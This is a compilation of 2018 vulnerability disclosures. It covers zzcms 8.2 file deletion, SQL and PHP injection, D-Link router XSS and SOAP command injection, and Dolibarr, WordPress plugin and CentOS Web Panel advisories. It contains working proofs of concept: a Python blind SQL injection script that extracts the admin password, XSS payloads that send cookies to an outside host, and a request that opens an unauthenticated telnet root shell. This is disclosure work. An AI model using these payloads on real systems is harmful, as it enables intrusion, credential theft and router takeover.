An issue was discovered in zzcms 8.2. user/licence_save.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

licence\_save.php

bug

true

**user/licence\_save.php****Edition :**

zzcms 8.2

**Location**

/user/licence_save.php

**Code:**

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
			$f\="../".$oldimg;
			if (file\_exists($f)){
			unlink($f);
			}
			$fs\="../".str\_replace(".","\_small.",$oldimg)."";
			if (file\_exists($fs)){
			unlink($fs);		
			}
		}

**Rows : 31****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

Through the code can know that we only control oldimg, and it did not carry out the appropriate filtering

first create test.php

Then perform the operation, remember to meet $oldimg<>$img && $oldimg<>"/image/nopic.gif"

Then execute

Then find test.php is gone

**poc**

GET:
http://127.0.0.1:8080/user/licence\_save.php?action=modify
POST:
id=11&oldimg=test.php&img=1231

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8969: vulnerability/licence_save.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. It allows SQL injection via the id parameter in an adv2.php?action=modify request.

Permalink

Cannot retrieve contributors at this time

title

tags

grammar\_cjkRuby

adv2.php

新建,模板,小书匠

true

**/user/adv2.php****Edition :**

zzcms 8.2

**Location**

/user/adv2.php

**Code:**

$rs=query("select * from zzcms_ad where id=".$_POST["id"]."");

**Rows : 72****Harm**

Can get password through SQl injection

**Cause the cause**

Take a look at the logic of the bug, first slowly back up and found that need to enter here first and need to make a, c not all 0

That is to say, let **zzcms\_main** or **zzcms\_zh** have a value. Adding it directly tells the user that they do not have permission.In this case, directly POST

Then go back and find that need to let action=modify

At this point , first debug it, directly in phpstorm debugging id=0 or if((select ascii(substr(pass,1,1)) from zzcms_admin)=50,sleep(5),0), found that there really is Delay.

**poc**

import requests
import string
s = requests.session()
url = "http://127.0.0.1:8080/user/adv2.php?action=modify"
cookies = {
'UserName':'test2'
}
flag = ''
for i in range(1,40):
 for j in range(33,125):
   data = {
     'id':'0 or if((select ascii(substr(pass,{},1)) from zzcms\_admin)={},sleep(3),0)'.format(i,j)
   }
   #print data
   r = s.post(url,data=data,cookies=cookies)
   #print r.text
   sec=r.elapsed.seconds
   #print i,j,sec
   if sec >2:
     flag += chr(j)
     print flag
     break
print flag

Get the administrator password

CVE-2018-8967: vulnerability/adv2.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/manage.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg or oldflv parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

manage.php

bug

true

**/user/manage.php****Edition :**

zzcms 8.2

**Location**

/user/manage.php

**Code:**

if ($oldimg<>$img && $oldimg<>"/image/nopic.gif"){
	$f\="../".$oldimg;
	if (file\_exists($f)){
	unlink($f);
	}
	$fs\="../".str\_replace(".","\_small.",$oldimg);
	if (file\_exists($fs)){
	unlink($fs);		
	}
}
if ($oldflv<>$flv){
	$f\="../".$oldflv;
	if (file\_exists($f)==true){
	unlink($f);
	}
}

**Rows : 61****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

First analyze the code, the first condition is action=modify

Satisfaction condition, must make the judgment of founderr=1, that is to say, must make content not empty

In this case, direct control of the data in **oldimg** or **oldflv**. POST ,then value can be achieved.

**poc**

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8968: vulnerability/manage.php.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. It allows PHP code injection via the siteurl parameter to install/index.php, as demonstrated by injecting a phpinfo() call into /inc/config.php.

Permalink

Cannot retrieve contributors at this time

title

tags

grammar\_cjkRuby

install

bug

true

**Edition :**

zzcms 8.2

**Location**

/install/index.php

**Code:**

$str=str_replace("define('siteurl','".siteurl."')","define('siteurl','$url')",$str) ;

**Rows : 114****Harm**

Website information leaked

**Cause the cause**

The parameters here will be stored in /inc/config.php, so if I construct the corresponding statement, close the brackets, so that i can successfully perform sql injection.Due to waf reasons, only can control **siteurl**

Write siteurl=1');phpinfo();#

The discovery can be performed, due to the need to verify the database information before, so the use of the premise is that the install directory is not deleted, and should guess the database user name password

**poc**

**str** Parameter result：

finally successful

CVE-2018-8966: vulnerability/install.md at master · Ni9htMar3/vulnerability

An issue was discovered in zzcms 8.2. user/ppsave.php allows remote attackers to delete arbitrary files via directory traversal sequences in the oldimg parameter in an action=modify request. This can be leveraged for database access by deleting install.lock.

title

tags

grammar\_cjkRuby

ppsave.php

bug

true

**/user/ppsave.php****Edition :**

zzcms 8.2

**Location**

/user/ppsave.php

**Code:**

if ($oldimg<>$img && $oldimg<>"image/nopic.gif") {
	//deloldimg
		$f\=$oldimg;
		if (file\_exists($f)){
		unlink($f);		
		}
		$fs\=str\_replace(".","\_small.",$oldimg);
		if (file\_exists($fs)){
		unlink($fs);		
		}

**Rows : 68****Harm**

Allows attackers to delete files arbitrarily

**Cause the cause**

First analyze the code, the first condition is action=modify

There is no other previous condition, just can directly control oldimg

**poc**

An attacker can use this vulnerability to delete any file, such as deleting install.lock for CMS reinstall and hijacking the website database.

**Solution**

Can be filtered through the input of control parameters, strictly control the type of parameters, suffixes

CVE-2018-8965: vulnerability/ppsave.php.md at master · Ni9htMar3/vulnerability

OS command injection vulnerability in soap.cgi (soapcgi_main in cgibin) in D-Link DIR-880L DIR-880L_REVA_FIRMWARE_PATCH_1.08B04 and previous versions, DIR-868L DIR868LA1_FW112b04 and previous versions, DIR-65L DIR-865L_REVA_FIRMWARE_PATCH_1.08.B01 and previous versions, and DIR-860L DIR860LA1_FW110b04 and previous versions allows remote attackers to execute arbitrary OS commands via the service parameter.

**0x00 Product Description**

Dlink is a multinational networking equipment manufacturing corporation.

The Dlink 860L/865L/868L/880L are wireless "Cloud" Router.

The vulnerabilities details are as follows:

Vendor: D-Link

Devices: DIR-880 REVA / DIR-868 REVA / DIR-865 / DIR-860 REVA

Firmware:

DIR-880L\_REVA\_FIRMWARE\_PATCH\_1.08B04

DIR868LA1\_FW112b04

DIR-865L\_REVA\_FIRMWARE\_PATCH\_1.08.B01

DIR860LA1\_FW110b04

**0x01 Vulnerabilities Summary**

The Dlink 860L/865L/868L/880L is a router overall badly designed with a lot of vulnerabilities.

My research in analyzing the security of Dlink routers starts from a recent security contest organized by a security company.

**0x02 The summary of the vulnerabilities is:**

1.  WAN && LAN - revA/B - XSS - CVE-2018-6527, CVE-2018-6528, CVE-2018-6529
2.  LAN - revA/B - OS command injection - CVE-2018-6530

**0x03 Details - WAN && LAN - revA/B - XSS**

After analyzing PHP files inside /htdocs/webinc, I found several trivial XSS vulnerabilities.

An attacker can use the XSS to target an authenticated user in order to steal the authentication cookies.

1.  xss inside /htdocs/webinc/body/bsc\_sms\_send.php

\[…\]
                <span class="value">
                        <input id="receiver" type="text" size="50" maxlength="15" value="<? echo $\_GET\["receiver"\]; ?>"/>
                </span>
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc\_sms\_send.php?receiver="><script>window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie)</script><"

2.  xss inside /htdocs/ webinc/js/adv\_parent\_ctrl\_map.php

\[…\]
                var msgArray =
                \[
                        '<?echo i18n("You have successfully configured your router to use OpenDNS Parental Control.");?>',
                        '<?echo i18n("Do you want to test the function?");?>',
                        '<p><input type="button" value="<?echo i18n('Test');?>" onclick="window.open(\\'http://www.opendns.com/device/welcome/?device\_id=<? echo $\_GET\["deviceid"\];?>\\')" /\><input type\="button" value\="<?echo i18n('Return');?>" onClick\="self.location.href=\\'adv\_parent\_ctrl.php\\';" /></p\>'
                \];
                BODY.ShowMessage('<?echo i18n("OpenDNS PARENTAL CONTROLS");?>', msgArray);
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/adv\_parent\_ctrl\_map.php?deviceid=whatever\\');window.open(\\'http://9.9.9.9:9999/cookie.asp?msg=\\'+document.cookie

3.  xss inside /htdocs/ webinc/js/bsc\_sms\_inbox.php

\[…\]
        InitValue: function(xml)
        {
                var get\_Treturn = '<?if($\_GET\["Treturn"\]=="") echo "0"; else echo $\_GET\["Treturn"\];?>';		
         … 
        }
\[…\]

An attacker could lure the victim to inadvertently open this vulnerable page as an authenticated user: http://192.168.0.1/bsc\_sms\_inbox.php?Treturn=0';window.open('http://9.9.9.9:9999/cookie.asp?msg='+document.cookie);get\_Treturn='1

**0x04 Details - LAN - revA/B - Command injection in SOAP controlType url interface**

The vulnerability occurs in /htdocs/cgibin which is executed by the web server for, just handles almost http requests from WAN and LAN, and my research in analyzing SOAP interface started from a security analysis report regarding UPNP protocol, then I reviewed the SOAP interface, which is handled by the soapcgi\_main function in cgibin, seems to have been mostly overlooked.

It should be noted that you could insert and execute malicious commands without privilege, meanwhile the injection point is the service field which is passed to soap.cgi to indicate control type, this exploitation also works even if invalid SOAPAction and whatever XML stream in a request.

Here’s the code in C to show some details about this issue:

/\* Grab a pointer to the request url \*/
requri \= getenv("REQUEST\_URI");
/\* goto failure if the urquri does not start with "?service=" \*/
if((query \= strchr(requri, "?")) \== NULL or strncmp(query, "?service=", strlen("?service=")))
{
    goto failure\_condition;
}
/\* Point the control type field pointer 9 bytes beyond the requri \*/ 
controlType \= query + strlen("?service=");

... ...

/\* Create/open a shell script using the specified control type string \*/
sprintf(filename, "%s/%s\_%d.sh", "/var/run", controlType, getpid());
fn \= fopen(filename "a+");
/\* Write self-deleting command into the srcipt and execute it by "sh -c"\*/
if(fn)
{
    fprintf(fn, "rm -f %s/%s\_%d.sh", "/var/run", controlType, getpid());
    fclose(fn);
    sprintf(filename, "%s/%s\_%d.sh", "/var/run", controlType, getpid());
    system(filename);
}

Proof of concept:

    POST /soap.cgi?service=whatever-control;iptables -P INPUT ACCEPT;iptables -P FORWARD ACCEPT;iptables -P OUTPUT ACCEPT;iptables -t nat -P PREROUTING ACCEPT;iptables -t nat -P OUTPUT ACCEPT;iptables -t nat -P POSTROUTING ACCEPT;telnetd -p 9999;whatever-invalid-shell HTTP/1.1
    Host: 192.168.100.1:49152
    Accept-Encoding: identity
    Content-Length: 16
    SOAPAction: "whatever-serviceType#whatever-action"
    Content-Type: text/xml
    
    whatever-content
    
    Here, we can easily build a soap http request and embed malicious command that spawns a telnet server on WAN that provides an unauthenticated root shell into it, and then login into router using telnet:
    $ telnet 192.168.0.1 9999
    Trying 192.168.0.1...
    Connected to 192.168.0.1.
    Escape character is '^]'.
    

**0x05 Report Timeline**

Dec 8, 2017: Vulnerabilities found.

Jul 18, 2018: Reported to security@dlink.com.

Jul 18, 2018: The vendor followed up and made a schedule to fix it.

Feb 1, 2018: Reported those security issues to MITRE.

Feb 1, 2018: MITRE provides CVE-2018-6527, CVE-2018-6528, CVE-2018-6529, CVE-2018-6530.

Mar 1, 2018: The vendor release security announcement for customers.

Mar 2, 2018: I decide to make a public disclosure.

**0x06 Credits**

These vulnerabilities were found by Kaixiang Zhang.

**0x07 References****DIR-880L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-880L/REVA/DIR-880L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.08B06\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-880L/REVA/DIR-880L\_REVA\_FIRMWARE\_PATCH\_v1.08B06\_BETA.zip

**DIR-865L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-865L/REVA/DIR-865L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.10B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-865L/REVA/DIR-865L\_REVA\_FIRMWARE\_PATCH\_v1.10B01\_BETA.zip

**DIR-868L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-868L/REVA/DIR-868L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.20B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-868L/REVA/DIR-868L\_REVA\_FIRMWARE\_PATCH\_v1.20B01\_BETA.zip

**DIR-860L RevA**

Release Notes - ftp://ftp2.dlink.com/SECURITY\_ADVISEMENTS/DIR-860L/REVA/DIR-860L\_REVA\_FIRMWARE\_PATCH\_NOTES\_1.11B01\_EN\_WW.pdf

Firmware - ftp://FTP2.DLINK.COM/SECURITY\_ADVISEMENTS/DIR-860L/REVA/DIR-860L\_REVA\_FIRMWARE\_PATCH\_v1.11B01\_BETA.zip

CVE-2018-6530: GitHub - soh0ro0t/Pwn-Multiple-Dlink-Router-Via-Soap-Proto: 日前我发现了D-Link DIR 880L/865L/868L/860L路由器存在多个XSS和命令注入漏洞，最主要的问题是路由器未对用户输入进行检查，导致恶意数据请求被执行，最终被远程攻击者控制整个设备。

zzcms 8.2 allows remote attackers to discover the full path via a direct request to 3/qq_connect2.0/API/class/ErrorCase.class.php or 3/ucenter_api/code/friend.php.

CVE-2018-7434

Dolibarr version 6.0.2 contains a Cross Site Scripting (XSS) vulnerability in Product details that can result in execution of javascript code.

**Bug**

Stored Cross-site scripting (XSS) using product page, bypassing XSS detection

**Environment**

*   **Version**: 6.0.2
*   **OS**: Ubuntu
*   **Web server**: Apache
*   **PHP**: 7.0
*   **Database**: MySQL
*   **URL(s)**: product/card.php?id=1929&mainmenu=home

**Expected and actual behavior****Expected behaviour**

XSS detector picks up on the payload and refuses to save it

**Actual behaviour**

XSS payload is saved with no interference from the detector. When visiting the page later, the payload executes.

**Steps to reproduce the behavior**

1.  Log into Dolibarr with a user who can edit the name of a product
2.  Choose a product (this products name will be changed FYI), and click on the modify details button
3.  Append the following payload to the product's current name: <iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

**Suggested implementation**

Change the detector to now pick up on similar payloads (including this one)

CVE-2017-1000509: Stored Cross-site scripting (XSS) in product page · Issue #7727 · Dolibarr/dolibarr

admin/partials/wp-splashing-admin-main.php in the Splashing Images plugin (wp-splashing-images) before 2.1.1 for WordPress allows authenticated (administrator, editor, or author) remote attackers to conduct PHP Object Injection attacks via crafted serialized data in the 'session' HTTP GET parameter to wp-admin/upload.php.

Timestamp:

01/22/2018 07:29:38 PM (5 years ago)

janhenckens

Message:

Security update  

Location:

wp-splashing-images/trunk

Files:

  

*   README.txt (2 diffs)
*   admin/partials/wp-splashing-admin-main.php (1 diff)
*   admin/partials/wp-splashing-admin-sidebar.php (1 diff)
*   wp-splashing-images.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **wp-splashing-images/trunk/README.txt**
    
    r1799926
    
    r1807349
    
     
    
    5
    
    5
    
    Requires at least: 4.0
    
    6
    
    6
    
    Tested up to: 4.9.1
    
    7
    
     
    
    Stable tag: 2.1.0
    
     
    
    7
    
    Stable tag: 2.1.1
    
    8
    
    8
    
    License: GPLv2 or later
    
    9
    
    9
    
    License URI: http://www.gnu.org/licenses/gpl-2.0.html
    
    …
    
    …
    
     
    
    33
    
    33
    
    \== Changelog ==
    
    34
    
    34
    
     
    
    35
    
    \= 2.1.1 =
    
     
    
    36
    
    \* Fixed 2 security issues
    
     
    
    37
    
    35
    
    38
    
    \= 2.1 =
    
    36
    
    39
    
    \* Updated unsplash library and use the new download function
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-main.php**
    
    r1799926
    
    r1807349
    
     
    
    20
    
    20
    
        </h1>
    
    21
    
    21
    
            <?php if($\_GET\['session'\]) {
    
    22
    
     
    
    23
    
     
    
                $data = unserialize(base64\_decode($\_GET\['session'\]));
    
     
    
    22
    
                $data = unserialize(base64\_decode($\_GET\['session'\]), \['allowed\_classes' => false\]);
    
    24
    
    23
    
                $this->unsplash->saveTokens($data\['token'\]);
    
    25
    
    24
    
                $user = $this->unsplash->getUser(); ?>
    
*   **wp-splashing-images/trunk/admin/partials/wp-splashing-admin-sidebar.php**
    
    r1675965
    
    r1807349
    
     
    
    7
    
    7
    
                    <form id="splashing-search" method="get" action="<?php echo esc\_url(admin\_url('admin-post.php')); ?>">
    
    8
    
    8
    
                        <label class="screen-reader-text" for="post-search-input">Search Posts:</label>
    
    9
    
     
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo $\_GET\['search'\]; ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
     
    
    9
    
                        <input type="search" id="post-search-input-splashing" name="search" value="<?php echo sanitize\_title\_for\_query($\_GET\['search'\]); ?>" placeholder="<?php \_e('Search unsplash.com', 'wp-splashing-images'); ?>">
    
    10
    
    10
    
                        <input type="hidden" name="action" value="wp\_splashing\_search">
    
    11
    
    11
    
                        <input type="hidden" name="paged" value="1">
    
*   **wp-splashing-images/trunk/wp-splashing-images.php**
    
    r1799926
    
    r1807349
    
     
    
    17
    
    17
    
     \* Plugin URI:        http://studioespresso.co
    
    18
    
    18
    
     \* Description:       Unsplash.com), right in your dashboard. Add photos with one click and use them in your content right away.
    
    19
    
     
    
     \* Version:           2.1.0
    
     
    
    19
    
     \* Version:           2.1.1
    
    20
    
    20
    
     \* Author:            Studio Espresso
    
    21
    
    21
    
     \* Author URI:        http://studioespresso.co
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2018-6195: Changeset 1807349 for wp-splashing-images – WordPress Plugin Repository

CentOS-WebPanel.com (aka CWP) CentOS Web Panel through v0.9.8.12 has XSS via the `module` value of the `index.php` file.

Document Title: =============== CentOS Web Panel v0.9.8.12 - CS Cross Site Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1835 http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-5961 CVE-ID: ======= CVE-2018-5961 Release Date: ============= 2018-01-17 Vulnerability Laboratory ID (VL-ID): ==================================== 1835 Common Vulnerability Scoring System: ==================================== 4 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== CentOS Web Panel - Free Web Hosting control panel is designed for quick and easy management of (Dedicated & VPS) servers without of need to use ssh console for every little thing. There is lot's of options and features for server management in this control panel. CWP automatically installs full LAMP on your server (apache,php, phpmyadmin, webmail, mailserver…). (Copy of the Homepage: http://centos-webpanel.com/features ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a client-side cross site scripting vulnerability in the CentOS Web Panel v0.9.8.12. Vulnerability Disclosure Timeline: ================================== 2017-01-15: Non-Public Disclosure (Vulnerability Laboratory - Shared Customer Research Feed) Discovery Status: ================= Published Affected Product(s): ==================== CWP Product: CentOS Web Panel - (CWP) 0.9.8.12 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official CentOS Web Panel v0.9.8.12. The vulnerability allows remote attackers to inject script code to the client-side browser to application requests. The client-side cross site web vulnerability is located in the \`module\` value of the \`index.php\` file GET method request. The vulnerability can be exploited by remote attackers with a prepared malicious link to the centos web-panel application. The request method to inject is GET and the attack vector is non-persistent. The injection point is the module parameter and the execution point occurs in the module exception. The security risk of the client-side vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.3. Exploitation of the non-persisten vulnerability requires no privileged web-application user account and low user interaction. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected or connected application modules. Request Method(s): \[+\] GET Vulnerable Module(s): \[+\] index.php Vulnerable Parameter(s): \[+\] module Proof of Concept (PoC): ======================= The cross site scripting vulnerability can be exploited by remote attackers without privileged web-application user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Dork(s): "powered by CentOS-WebPanel.com" PoC: Payload(s) http://localhost:2030/index.php?module=clam%3E%22%3Ciframe%20src=a%20onload=alert%28document.cookie%29%20%3C http://localhost:2030/index.php?module=clam PoC: Exception-Handling

The module clam>"<\[CLIENT SIDE SCRIPT CODE PAYLOAD EXECUTION!\]> does not exist.

\--- PoC Session Logs \[POST\] --- Status: 200\[OK\] GET http://localhost:2030/index.php?module=clam%3E%22%3Ciframesrc=a%20onload=alert(document.cookie)%20%3C Mime Type\[text/html\] Request Header: Host\[localhost:2030\] User-Agent\[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0\] Accept\[text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8\] Cookie\[cwpsrv-3cc0cea69668d490e1029c2a41ce5df3=8fnvi0bqgjj162mqklruu8clq5; PHPSESSID=8dsrha0ivd80kkgukvklgvmct1\] Connection\[keep-alive\] Response Header: Server\[Apache/2.2.27 (Unix) mod\_ssl/2.2.27 OpenSSL/1.0.1e-fips PHP/5.4.27\] X-Powered-By\[PHP/5.4.27\] Expires\[Thu, 19 Nov 1981 08:52:00 GMT\] Keep-Alive\[timeout=5, max=100\] Connection\[Keep-Alive\] Transfer-Encoding\[chunked\] Content-Type\[text/html\] Reference(s): http://localhost:2030/index.php Solution - Fix & Patch: ======================= The vulnerability can be patched by a secure parse and encode of the vulnerable module parameter in the index-php file GET method request. Disallow special chars and restrict the parameter input to prevent further client-side script code injection attacks. Encode the output of the error exception for invalid inputs to prevent the execution point of the client-side vulnerability. Security Risk: ============== The security risk of the client-side cross site scripting web vulnerability in the centos web panel is estimated as medium. Credits & Authors: ================== Vulnerability-Lab \[admin@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

Tag

#php